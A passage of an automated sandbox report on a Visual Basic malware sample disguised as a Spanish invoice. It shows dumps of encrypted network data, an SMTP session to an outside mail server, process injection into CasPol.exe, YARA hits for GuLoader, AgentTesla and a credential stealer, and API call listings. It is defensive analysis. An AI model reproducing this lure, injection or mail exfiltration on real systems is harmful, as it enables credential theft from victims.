29 77 09 af d5 09
                                              Data Ascii: v3l=LBQa0+Y9nY`B=5e{UJ{uKG&8$pj +2:p~$l(G8@bTjJak:OvStj]Y1 X\pbfEc{+|gKlYdh`}n3%__sbO)w
                                              2021-12-03 07:24:05 UTC205INData Raw: 51 d7 d1 e3 2c d4 b1 fb 77 78 d6 c2 ef c6 89 50 a2 e1 1b a7 e2 51 69 50 d9 bf f0 48 b5 d9 2a 35 2d cc 3e f6 3e af bf 98 06 d7 4c 1a a9 74 bf 75 67 bc d1 f0 fb da 1a 41 b6 de ac ee 8a 9a 56 d5 b3 19 67 d8 95 cc 48 af 4e 9e b0 82 70 98 76 d3 bf 7c 9b 7f 20 04 bd d2 79 b4 33 d2 3e 6b e5 ac 96 73 4f 03 7a 91 16 8a 0a 9e db d6 cc b0 0c 06 64 a8 6d f7 a6 80 63 26 fe 2d c1 62 82 0e 22 86 2e b4 9d b8 ed 61 42 9a 43 6a 33 29 6c 1d 9d a6 3f 6a 7b 84 66 68 c0 1b 0b 9b 63 ae f3 6a c3 6e 32 f6 c8 a4 26 a7 8f a2 2b e5 4f b6 b8 5c 75 b8 b8 35 e5 41 fa ed ff 73 15 bc c7 82 1a 5e 5e e5 19 75 71 d4 cc 3e 77 f5 be 2b ca 1b a2 5c a0 32 3f eb 22 c0 66 43 33 96 14 af ce 56 63 0e a8 09 9e 37 0c 3b 4d 43 5e 3a 2d 89 26 13 15 d4 1a f6 3c 93 97 86 a1 c4 c3 ee f3 78 73 ba 89 59 8c
                                              Data Ascii: Q,wxPQiPH*5->>LtugAVgHNpv| y3>ksOzdmc&-b".aBCj3)l?j{fhcjn2&+O\u5As^^uq>w+\2?"fC3Vc7;MC^:-&<xsY
                                              2021-12-03 07:24:05 UTC207INData Raw: cd b2 db ea 54 a9 e5 ad 18 9b b4 60 78 83 32 4c e1 f8 09 c7 ee 1e c9 25 05 0f 7b 97 f4 e2 a7 12 87 aa d9 d1 db 83 24 09 79 6a da c0 c2 a1 99 cf 3b 28 9a 48 99 7a 6f 20 f8 44 09 3e e4 ae 6b 7b 0d be 29 c5 b0 56 35 95 f2 e9 09 56 f8 62 49 bf 06 e3 03 54 24 95 e8 de 37 69 9a 74 b5 ec 1e 9a d7 ee b7 d9 0c 2b 3d 56 fc 18 53 cf 8e 58 84 c5 f6 95 9c e8 af db a9 b4 65 8a 43 f6 b8 e6 1b 52 3b 1e 0d 89 7a b0 5c 7f 9a 07 10 a8 f2 5c 41 f4 14 37 65 ea b8 ba 71 ca 54 89 38 7c 52 57 16 7f 86 5f a7 99 fd 26 c8 cd 37 29 92 77 5d a8 df 32 07 b5 ff 49 35 61 da 4c 68 96 32 aa bc ab e3 88 d4 3c 25 b7 31 4c 16 ab 29 92 48 94 44 c9 30 70 03 b9 d2 10 46 62 18 0d 59 9f ff 62 66 32 aa e9 65 88 47 72 76 ba fc 61 c2 b5 14 cf 20 aa c9 19 ee 01 d0 b6 45 b0 4c f5 cb f5 97 40 42 a9 31
                                              Data Ascii: T`x2L%{$yj;(Hzo D>k{)V5VbIT$7it+=VSXeCR;z\\A7eqT8|RW_&7)w]2I5aLh2<%1L)HD0pFbYbf2eGrva EL@B1
                                              2021-12-03 07:24:05 UTC208INData Raw: 04 cc 66 99 3c 6e a6 bd d6 e6 cc 27 4a 9c 9c 90 e9 88 83 6b cc a2 12 28 ef 8e da 56 a8 21 8a a7 97 5f b9 61 b0 b4 6c 8b 45 28 19 89 db 7b b4 3e c7 71 5c e5 aa b2 7f 43 0f 61 96 7f b7 14 ac dc c0 c4 f3 2d 05 71 c4 6f f1 a6 b6 4d 2c e9 5f d7 74 85 17 0e 8a 3f b1 89 cd cd 55 5b 9a 45 77 3e 24 05 3f a1 ba 5b 41 65 8e 66 77 ea 1b 15 91 63 ae fe 6b de 65 38 8b ea bd 21 a7 a9 bf 3a a2 73 bd b9 35 46 b1 b6 2a fc 7a e3 f6 f8 32 3d a0 b5 88 1e 5e 75 c7 19 69 2a e6 d6 50 71 e2 b3 74 ee 16 b7 71 87 5d 0c ef 3a d3 66 5b 32 8c 77 89 c7 6f 4f 0e a6 1c 82 72 21 2a 47 46 4f 2d 1a e0 07 0f 05 d4 10 e9 6b c7 99 8e b0 e9 e2 8b c6 64 6e ba 92 4d e9 53 f2 6d 5a 9c e7 c0 b1 73 c1 21 9c c4 48 c6 5a f6 0f 18 1a 8f df fe 77 6b 70 39 96 42 76 ed 50 58 4c c6 e4 e9 1c f1 40 b8 0b e3
                                              Data Ascii: f<n'Jk(V!_alE({>q\Ca-qoM,_t?U[Ew>$?[Aefwcke8!:s5F*z2=^ui*Pqtq]:f[2woOr!*GFO-kdnMSmZs!HZwkp9BvPXL@
                                              2021-12-03 07:24:05 UTC209INData Raw: ab ae ec f0 86 5c 47 f2 50 cc 37 1a 51 a9 a8 e5 5f aa db 6a 25 72 cd 5e a8 d3 76 7a f0 9c 89 6c 3d 93 07 26 d9 86 2a 60 3d 61 f9 90 a1 37 02 ce 74 e6 18 f7 fe b4 87 db ae 0b 5b 3d 12 93 60 3c bd e2 37 e7 ae 9a e6 9c b2 c3 b9 fc 5b a3 fc 28 81 bb 94 3b 37 4c 07 5c db 1e e2 3b 10 e0 1b 53 cd 87 04 2e 80 76 5a 0d e7 ce fb 01 95 16 f2 43 0b 37 39 70 ff 0e 0a c2 f7 8b f6 62 a0 59 5c 9f 1e 3b dc 80 62 78 d1 98 2b 62 8f 73 0e 87 2e 4e 5e 69 de 06 25 85 79 4a c3 4d b8 cb c2 49 e6 17 d2 ad 4f 5d 13 6d cd ae e4 a3 21 5d 78 1b ff 9b 30 25 4f 5f 56 14 a8 02 0e 92 2e 99 22 a6 c4 72 4f b7 dc a9 78 92 c0 7e c7 a0 11 2a 75 5c ab e0 2b b2 2c 7d 4c d8 27 d0 cb fd 9b 40 4c ef 64 4a 10 9e 65 a6 98 f2 b0 48 6f 9a eb d9 48 ba 7d 3a 81 70 b0 59 19 1a f3 0b de d3 6a dd b8 e0 09
                                              Data Ascii: \GP7Q_j%r^vzl=&*`=a7t[=`<7[(;7L\;S.vZC79pbY\;bx+bs.N^i%yJMIO]m!]x0%O_V."rOx~*u\+,}L'@LdJeHoH}:pYj
                                              2021-12-03 07:24:05 UTC210INData Raw: fb ac 97 1b 5b 9e 73 1a 92 5f 4a 15 a7 d1 1d c2 14 d8 61 6d 7a a1 20 57 4a 49 08 d6 89 45 d7 c9 0c 5a 0c f8 ba 12 e4 d0 b6 e6 44 5c 35 c5 a0 23 36 fc ac d2 5c 53 03 5e ce c2 49 82 c8 e8 05 18 ab 7a 6b fa e2 c8 8f 19 a8 07 55 a6 b0 c0 5f dd c8 d3 7d 8a 20 db c3 52 29 d7 de 46 9a 09 89 97 87 9d 42 c7 c2 c5 7d 24 09 aa 6e 1a 06 aa b1 36 1a 97 cf 76 9b 16 cb 33 c1 57 70 ab 51 92 00 2c 4f f8 11 fa 2b ef 24 71 f9 7c 7b 82 6c 44 30 a7 ee 5a de 58 67 ea b3 b2 ff 42 00 ae ef 6a fd ab be ea a1 0c 13 c6 e6 14 e8 35 85 98 d8 d9 a6 b1 d1 01 29 b0 e0 c4 1b bd 33 94 60 6b 60 81 ad 80 20 2b 21 4c e5 af f6 9a 29 58 3b be bb a3 7a 8c 23 4c f7 87 42 eb 4e e7 dc 96 45 2d ed 0f dc 67 54 ae f6 0f e9 a0 5b 8d 96 8f 4d a2 1a e4 43 31 1d 4a 7b 8d e5 6a 10 0e 69 3c ef 19 fb 5d c9
                                              Data Ascii: [s_Jamz WJIEZD\5#6\S^IzkU_} R)FB}$n6v3WpQ,O+$q|{lD0ZXgBj5)3`k` +!L)X;z#LBNE-gT[MC1J{ji<]
                                              2021-12-03 07:24:05 UTC212INData Raw: 8c ba 4a 13 ee 7e fd 80 77 fe bc 96 cb 3d 56 42 38 1b 8f 6b 32 ad e9 3f fd a0 92 e8 84 ad c7 bf fd ca 87 cb 33 96 de 8f 1e 3d 4e 62 5a df 1c c0 28 91 0e 0f 52 ed 86 1d a2 df 79 59 10 fb 5f 3f 17 17 42 fa 4d 0a 35 3b 6a 77 c6 0f e6 f5 84 73 af ac 49 55 98 17 3b de 95 6c e9 4f 9f 2b 78 06 b9 1f 16 7f 88 cc 3e 91 8e f9 ab 7f 5b 40 3e 30 16 ce 4e e8 07 d2 af f7 5d 33 6d dd 3c b0 48 23 7d 78 1b e5 1f f1 21 7d de 86 0d 8e 22 1d 13 e9 1e e3 a1 c5 61 ce 70 4d cb 60 87 47 a2 55 c0 d1 b8 21 94 b3 ed 25 3a cf f7 05 d5 04 f1 c3 ea 94 70 4f eb 7b db 70 79 f5 c7 6f fe a2 c9 af 94 6c 39 43 b5 64 37 94 7d aa 7c 12 1e ee 0f cb de 6d d3 bd e7 1a 9c 26 59 42 62 c8 db 1f 04 02 be b6 a8 c2 d1 43 79 eb 7f f9 df 87 6b 69 ca 3e 29 61 99 52 1e 10 27 d6 a1 82 bc ae 6b b5 27 76 c3
                                              Data Ascii: J~w=VB8k2?3=NbZ(RyY_?BM5;jwsIU;lO+x>[@>0N]3m<H#}x!}"apM`GU!%:pO{pyol9Cd7}|m&YBbCyki>)aR'k'v
                                              2021-12-03 07:24:05 UTC213INData Raw: d3 f8 d5 91 a1 1e f2 34 0f 4a 53 0d 62 d3 df 55 1f 11 f9 17 9e 74 6c 77 6a be e5 9f 0a 28 dd 47 24 f8 d9 ce fa d2 50 82 82 2e ca 49 81 35 b4 cd 39 8c 8f a3 91 9e 04 7e cf c7 f7 fd cb 04 82 6b 08 86 41 b6 2b 02 12 c3 76 98 f2 ea 20 d5 12 79 9c d4 5e 00 26 61 e4 08 f4 a4 25 21 7b d5 72 e9 f0 bf 44 3e 3f 27 50 56 81 71 6a 67 a5 67 9f 12 c6 f0 f3 c0 b6 b1 e8 b9 09 3d cf e1 2c ed 34 96 05 1d d0 81 b5 c5 02 29 cc e4 d6 98 f3 35 94 68 7e 0a 83 b0 8c 3d 3c 80 d5 f6 3c 9e d9 27 56 31 b1 bc b5 60 15 a8 cc 78 0e 06 f7 41 e1 d6 fa 4d 31 e1 1b d9 61 49 a2 f1 08 f1 2b a2 a7 93 86 45 b9 92 6d 4b 21 b6 02 6f 97 6d f3 15 09 64 36 7c 01 67 47 4e b5 e7 ee a0 40 91 8e ca 46 84 72 b4 48 8e da 60 ea 86 6e a3 f9 b7 d9 6b ce e0 b5 82 7e c9 18 dd 45 8b 59 9e d1 c8 58 1b f3 10 60
                                              Data Ascii: 4JSbUtlwj(G$P.I59~kA+v y^&a%!{rD>?'PVqjgg=,4)5h~=<<'V1`xAM1aI+EmK!omd6|gGN@FrH`nk~EYX`
                                              2021-12-03 07:24:05 UTC214INData Raw: 64 5a c4 15 df 3a 19 f3 09 5f e2 81 14 35 94 f0 c0 10 f8 5e 9f 0b 9b 02 ee cb 97 36 2b e3 3f c1 01 ec f9 84 78 af aa 44 53 8f 1e 30 d4 88 76 7a 57 de 37 19 07 b6 01 04 f7 54 da 9c cd 8e f2 be 78 51 d7 4d b9 8f cd 5e 67 57 d5 3f 2b c2 32 7e 4d fc 6a 54 48 60 7a 07 f9 90 0d 26 40 dc 8f 1f 80 0c 01 1c e9 1e 42 a9 cd 68 cc 61 dd c7 78 9d 4e bb db 28 c8 3c d5 89 ab e6 3f 32 de 69 5e de 38 f7 cb f5 99 72 cd eb 62 44 97 67 61 34 e0 6f b1 5b e6 c6 f9 eb ca 2b 61 2d 08 38 bf 77 14 15 e0 00 de c9 ee 9d a8 88 0f 9e 2e 46 49 71 dc 45 33 26 85 64 a5 ba 42 5a c0 36 64 33 eb bf 94 7b 6a cb 7b 39 f3 cc 1c 18 08 a1 92 b2 89 a2 be 67 32 8b 71 c9 6c 95 1a 17 55 dc 32 0a e2 63 32 59 f2 17 e8 43 b4 4d 2c af 0c ce ff e0 8e b9 57 f3 3b 57 97 f8 61 2f e7 d6 78 8c 07 53 7e 56 e3
                                              Data Ascii: dZ:_5^6+?xDS0vzW7TxQM^gW?+2~MjTH`z&@BhaxN(<?2i^8rbDga4o[+a-8w.FIqE3&dBZ6d3{j{9g2qlU2c2YCM,W;Wa/xS~V
                                              2021-12-03 07:24:05 UTC216INData Raw: 4a c5 26 cf 5e 10 93 1b 98 18 0f 1d 69 4e 87 ed 55 2d 11 b7 79 9b 9d a5 ad bf 50 9e df 66 08 ea c2 3c 52 72 65 8b 44 03 ae 3f 44 f7 7d e6 a5 2a 24 71 48 2e e9 f3 72 56 3f 22 33 62 59 99 60 78 e7 39 7e 89 93 87 f0 f6 c1 a3 a2 6f 38 0c 0f 4f a0 26 69 94 8a 1c 17 b6 88 be d8 1e ba d4 a5 d6 98 a3 35 87 63 64 6a 88 b4 93 2d 33 04 51 f2 26 18 99 28 45 26 a4 3b 75 41 93 23 c3 7f 9d c7 72 4e fd 45 d3 50 3e 6e 8b d8 70 d5 ec ed 86 71 bb db 18 9a 85 d0 3a 0f fa 44 21 b6 02 72 98 fe ea 85 0f 6c 36 7d 09 7b 49 d2 e9 f4 e2 ba 65 9e 81 58 66 07 15 ba 66 80 d5 f3 2a 05 22 ac eb ac c3 c6 50 ef b2 11 bf 45 0b 4e 5d ca 5e 0d 10 5f 44 1b e8 0c ef 84 55 1f d6 32 99 e9 dc 44 e7 c6 ac 9d 77 54 84 25 4e f8 c8 7c 92 92 a0 f6 53 14 96 6c a0 67 6d d5 29 2b 18 4c 25 c3 1e d2 6d bc
                                              Data Ascii: J&^iNU-yPf<RreD?D}*$qH.rV?"3bY`x9~o8O&i5cdj-3Q&(E&;uA#rNEP>npq:D!rl6}{IeXff*"PEN]^_DU2DwT%N|Slgm)+L%m
                                              2021-12-03 07:24:05 UTC217INData Raw: 25 d9 86 5e 69 c4 1c 78 7e 0b b8 0e 87 1a 58 d8 ae 4c 46 f8 8d 6d cb b3 5b 3e 04 4d ad e3 11 dd 3f 2a 93 35 6b ce ae e4 a3 2d 78 59 1a e5 1e f5 23 5a dd 95 90 f9 0a 14 32 fa 8d 83 d6 d7 e1 be 64 ef af 72 92 c1 c2 d3 27 c2 2a 75 49 be e0 19 32 cf f5 90 d6 04 f1 ca e5 11 a0 49 e9 6b 46 82 eb bc 20 41 f5 b1 47 6f 8e e4 d9 4e b3 6e 37 87 76 bf 7d 1c 09 6c 53 d1 fb 6d dc a8 63 5a 91 28 64 46 7e df 45 b3 10 a2 6a a2 2b 6a ca e1 26 f7 f1 64 c9 18 cf 64 42 c2 3a e0 50 4e 96 d2 28 d7 bb 86 b3 2a 97 b8 1a 72 d5 f8 66 8a 9c ca c8 3b 0f f1 ef 8d 46 f9 11 ee 5f 3d a1 29 b7 80 87 f1 95 83 31 bf e7 3a 57 83 f5 69 0d ed d0 6d 98 11 d9 cf 75 f9 72 c9 ed 55 79 c5 7d 5d 07 26 6c 5e 8b 0b 9b b7 19 8e 2a 53 ed 8e 1c b0 b7 9b 41 a8 df 91 10 0b ab df bf a2 f9 31 d6 0d 90 f2 89
                                              Data Ascii: %^ix~XLFm[>M?*5k-xY#Z2dr'*uI2IkF AGoNn7v}lSmcZ(dF~Ej+j&ddB:PN(*rf;F_=)1:WimurUy}]&l^*SA1
                                              2021-12-03 07:24:05 UTC218INData Raw: ef 1e eb 8b 22 23 60 e9 6e fc 76 64 49 a2 cf 39 48 5e 8b 7d 6a e6 12 17 9b 66 c7 8a eb b4 b6 c3 ee 9b 0d 32 ce cf 34 9e 34 e0 19 72 df a8 b0 a4 10 c0 55 80 c4 76 b3 55 9a 0f 6c 0c 8f de 8e 5a 2e 6e 4c 82 2e 6b 99 4c 58 51 b6 95 a0 11 94 5e cd 07 8f 69 eb 2b ef ad 93 36 2c 9b 12 f7 62 20 ac 90 06 92 a9 2b 89 e6 97 3f ab 79 f4 2f 33 54 42 0e 85 c2 6a 7b 07 03 24 9a 98 49 55 bb f5 86 e0 cf 45 fd 9c 38 e6 f9 1b cb 46 f3 c8 84 aa e6 07 84 e4 80 d1 69 c9 db a0 be ff 63 19 e0 c4 bf 4c e3 50 23 59 38 e6 75 e1 e3 47 f0 96 0f 97 c9 b5 74 e4 fe b1 bd 53 67 89 1e 5c 4a 51 53 80 25 e0 cd 41 ef 0f 04 b2 96 2d d3 20 20 19 47 37 d9 91 eb 7b 1d fe b2 61 07 2c 71 74 a5 1c 3a c1 58 d5 5c ba 08 15 e6 97 cc f4 8b aa b5 9a a5 35 53 6e c0 58 97 d5 95 f0 eb 20 81 7e 8d ca 09 b0
                                              Data Ascii: "#`nvdI9H^}jf244rUvUlZ.nL.kLXQ^i+6,b +?y/3TBj{$IUE8FicLP#Y8uGtSg\JQS%A- G7{a,qt:X\5SnX ~
                                              2021-12-03 07:24:05 UTC219INData Raw: 77 08 76 96 0d 20 40 da 95 90 c8 1f 19 00 7a 97 1f a2 d7 09 c7 7f c1 a6 61 87 49 af db 3d c5 25 f0 95 a4 8c 24 2e c0 69 4d d2 2c f0 c8 f9 9f 7d 4a f3 6f 55 97 6c 7a 3b 64 ea a2 20 7a 9a f1 e5 56 b0 69 3f 8a 76 aa 7c 07 1e f3 0b d9 dc 68 c0 bf fc 02 85 3c 2d 5a 63 d0 da 07 17 88 6a b3 b5 c6 de c4 39 e0 6e fc df 9c 7f f9 56 e6 c7 1e b2 a3 12 13 20 d2 bc 83 ab ab 76 b0 3e 78 c7 79 87 9c 12 57 d2 3c 1b f5 f0 02 7b f8 7d e0 4d bc 44 3b 82 02 d2 e6 fb 91 b3 5d ed 2e 4b 9b fc 7c 28 e7 c0 78 94 20 59 63 45 fb 75 d9 e2 d1 e7 c3 76 51 0b 2a 73 58 82 10 81 38 53 91 2b d2 63 87 01 ba b8 92 4a a8 d3 12 f8 1e a2 c2 be b1 eb a4 27 82 31 f5 96 a8 4d 78 8b d9 99 35 d1 b0 5b 77 54 b4 45 93 4f dd c4 75 6d b5 c8 64 c4 01 e0 34 09 df bd 85 9f a1 52 2f f0 b2 97 8e fd a1 6b c4
                                              Data Ascii: wv @zaI=%$.iM,}JoUlz;d zVi?v|h<-Zcj9nV v>xyW<{}MD;].K|(x YcEuvQ*sX8S+cJ'1Mx5[wTEOumd4R/k
                                              2021-12-03 07:24:05 UTC221INData Raw: 53 df e3 b0 a2 10 db 55 8c c4 76 b3 55 9a 66 6c 63 8f 80 8e 06 2e 31 4c d9 2e 2f 99 07 58 13 b6 bb a0 06 94 1b cd 6b 8f 0f eb 21 ef b0 93 20 2c 9d 12 b7 62 35 ac 93 06 ae a9 3a 89 f9 97 35 ab 13 f4 04 33 40 42 03 85 b8 6a 6d 07 13 24 8d 98 2a 55 8e f5 a6 e0 ee 45 d5 9c 02 e6 fa 1b d6 46 c9 c8 94 aa ee 07 d9 e4 cb d1 2f c9 9b a0 c3 ff 08 19 86 c4 af 4c c0 50 21 59 64 e6 72 e1 f3 47 c9 96 46 97 96 b5 3a e4 9f b1 f4 53 7d 89 55 5c 01 51 18 80 13 e0 cb 41 97 0f 6c b2 aa 2d be 27 42 04 23 2b bd 9f a0 7f 52 ff c0 69 76 2b 00 66 a9 14 40 d3 55 dc 2f bf 00 09 da 85 a5 e9 eb b9 98 92 aa 27 9f 8b bc 4a 97 c7 72 14 9e 32 6f 92 fe 4b c4 96 0a ac 3f 70 0f 0f f2 87 e9 d3 2c d2 b4 bc c6 9a e4 41 29 0d 1d 8d dc a0 b6 f5 df 5e 24 ee 38 ca 5b 1b 11 bb 67 60 08 8a 90 6b 60
                                              Data Ascii: SUvUflc.1L./Xk! ,b5:53@Bjm$*UEF/LP!YdrGF:S}U\QAl-'B#+Riv+f@U/'Jr2oK?p,A)^$8[g`k`
                                              2021-12-03 07:24:05 UTC222INData Raw: f0 cb f7 91 60 4f ee 6a 5b 90 6b 74 26 61 f6 b0 49 67 86 ec f9 4b b2 60 3f 89 78 b7 79 1a 1b ee 0e d6 db 6f dd ba e1 07 99 2e 44 47 7f cd c6 1a 15 82 6a b0 a8 c3 c3 c1 24 e5 73 f9 db 9a 6e 78 4a e2 38 e1 4d 5c 16 1a 20 d2 bc 87 a1 ab 76 b0 3a 73 c7 79 87 98 1e 57 d2 3c 1f f3 e1 83 5b fc 19 e0 4d bc 40 2b a5 02 d2 e3 fc 92 b1 5f ef 26 4b 9f fd 61 2d ef d8 70 9d 00 5a 62 58 fe 68 dc ff d4 e0 c4 73 53 09 28 71 50 89 05 93 b9 17 92 38 d2 70 86 12 b8 bf 95 49 a6 c2 92 18 16 a5 c2 bc bf fa 24 c7 8c 35 f3 87 29 1d 7e 8b da 97 3d d9 b8 58 70 55 bc 4c 93 4d dc d6 f7 68 a4 4c 7d cc 00 e0 3c 09 df bd 85 9f bf 53 2f f1 b2 c3 8c eb f6 19 a5 d6 6b 06 ac fc a3 26 dc 4e ed d5 f6 2f d1 18 b0 d3 09 ff 1a 69 6a fa be 16 d6 52 be 71 1b 80 de f7 07 26 6c 14 e2 16 d9 73 ed af
                                              Data Ascii: `Oj[kt&aIgK`?xyo.DGj$snxJ8M\ v:syW<[M@+_&Ka-pZbXhsS(qP8pI$5)~=XpULMhL}<S/k&N/ijRq&ls


                                              SMTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Dec 3, 2021 08:25:40.912132025 CET58749824212.83.130.20192.168.11.20220-srv.teknomarketler.com ESMTP Exim 4.94.2 #2 Fri, 03 Dec 2021 10:25:40 +0300
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Dec 3, 2021 08:25:40.912561893 CET49824587192.168.11.20212.83.130.20EHLO 210979
                                              Dec 3, 2021 08:25:40.934145927 CET58749824212.83.130.20192.168.11.20250-srv.teknomarketler.com Hello 210979 [102.129.143.30]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPE_CONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Dec 3, 2021 08:25:40.934530020 CET49824587192.168.11.20212.83.130.20STARTTLS
                                              Dec 3, 2021 08:25:40.957628012 CET58749824212.83.130.20192.168.11.20220 TLS go ahead

                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: 184285013-044310-Factura pendiente (2).exe PID: 5644 Parent PID: 7504

                                              General

                                              Start time:08:23:34
                                              Start date:03/12/2021
                                              Path:C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe"
                                              Imagebase:0x400000
                                              File size:155648 bytes
                                              MD5 hash:05BEE3772CC551CBBAB5D5D8BD125015
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Visual Basic
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: conhost.exe PID: 6896 Parent PID: 5644

                                              General

                                              Start time:08:23:35
                                              Start date:03/12/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff76cd50000
                                              File size:875008 bytes
                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: CasPol.exe PID: 4576 Parent PID: 5644

                                              General

                                              Start time:08:23:49
                                              Start date:03/12/2021
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe"
                                              Imagebase:0x700000
                                              File size:108664 bytes
                                              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.151832663827.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: conhost.exe PID: 4940 Parent PID: 4576

                                              General

                                              Start time:08:23:49
                                              Start date:03/12/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff76cd50000
                                              File size:875008 bytes
                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Analysis Process: 184285013-044310-Factura pendiente (2).exe PID: 5644 Parent PID: 7504 184285013-044310-Factura pendiente (2).exeCOMMON

                                                Executed Functions

                                                Function 00404402, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 340memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,-000000016B82E580,486F0BD3,-000000014E62C612), ref: 0040477B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.152009216717.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.152009191692.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009377597.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: F\6
                                                • API String ID: 4275171209-877864894
                                                • Opcode ID: fcd35ea84c08e30e09a1d40709ca8a67aea7ee3d223b7cda8b0f9aa2ad02271d
                                                • Instruction ID: c26bfc2589231cd067dd9d2ef4e02888a8c1c051b8719567dccd8806810553d9
                                                • Opcode Fuzzy Hash: fcd35ea84c08e30e09a1d40709ca8a67aea7ee3d223b7cda8b0f9aa2ad02271d
                                                • Instruction Fuzzy Hash: FEA1EBB2408248AFEB855F71C48979A7FF0EF113A9F96144EFC8246092D7BC89C5CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041D074, Relevance: 344.8, APIs: 180, Strings: 16, Instructions: 1804COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0041D092
                                                • #692.MSVBVM60(?,Unecliptic9,Bovlamme1,?,?,?,?,00401356), ref: 0041D0E7
                                                • __vbaVarTstEq.MSVBVM60(00008008,?), ref: 0041D10E
                                                • __vbaFreeVar.MSVBVM60(00008008,?), ref: 0041D120
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,00008008,?), ref: 0041D14E
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 0041D1B0
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,00000108), ref: 0041D20F
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,00000108), ref: 0041D231
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041D250
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D289
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000158), ref: 0041D2D3
                                                • #618.MSVBVM60(?,00000087), ref: 0041D2EF
                                                • __vbaStrMove.MSVBVM60(?,00000087), ref: 0041D2F9
                                                • __vbaFreeStr.MSVBVM60(?,00000087), ref: 0041D301
                                                • __vbaFreeObj.MSVBVM60(?,00000087), ref: 0041D309
                                                • #711.MSVBVM60(?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D340
                                                • __vbaAryVar.MSVBVM60(00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D351
                                                • __vbaAryCopy.MSVBVM60(?,?,00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D367
                                                • __vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D37C
                                                • __vbaSetSystemError.MSVBVM60(?,?,00401356), ref: 0041D396
                                                • #517.MSVBVM60(phrontisterium), ref: 0041D3B7
                                                • __vbaStrMove.MSVBVM60(phrontisterium), ref: 0041D3C1
                                                • __vbaNew2.MSVBVM60(00403258,00422010,phrontisterium), ref: 0041D3E0
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D419
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000048), ref: 0041D45D
                                                • #712.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D484
                                                • __vbaStrMove.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D48E
                                                • __vbaFreeStr.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D496
                                                • __vbaFreeObj.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D49E
                                                • __vbaNew2.MSVBVM60(00403258,00422010,STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D4BD
